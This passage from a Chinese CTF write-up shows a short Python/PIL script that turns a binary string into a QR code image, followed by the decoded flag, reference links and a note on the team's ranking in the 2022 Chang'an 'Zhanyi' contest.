\n1001101111101110110010011111101011101\n1101100010111000000101110110001011010\n0011001000111101100011110100100111101\n0101000001110101110110101111110100010\n0101011011001001000000110100010011111\n0110100010001110010110011011111001100\n0111001111100000010110110111001111100\n0100110010110010100010111011000000000\n1111111101011001110011100101011101011\n0000000111000111011010110001010100100\n0111110111001101010110101100011101111\n0100010100110000110011010000000000010\n0100010101111101100011111111110100111\n0100010101101111111100000010101010110\n0111110111111000101101001111000110110\n0000000111111011110110000000100011000'
s = s.split('\n')

from PIL import Image
pic = Image.new('RGB',(37,37),(255,255,255))
for i in range(37):
    for j in range(37):
        if(s[i][j] == '0'):
            pic.putpixel((j,i),(0,0,0))
pic.show()
pic.save('flag.png')

得二维码,扫描得flag{932b2c0070e4897ea7df0190dbf36ece}

image-20220121195216242

Reference

长安”战疫”-WriteUp ChaMd5

2022 长安“战疫”网络安全卫士守护赛 WriteUp

彩蛋

本次比赛是Nilunus战队首战,排名137/591,收获长安“战疫”网络安全卫士的称号和很多知识,取得较为不错的成绩,望今后自己的学校战队能取得惊人的网安成绩!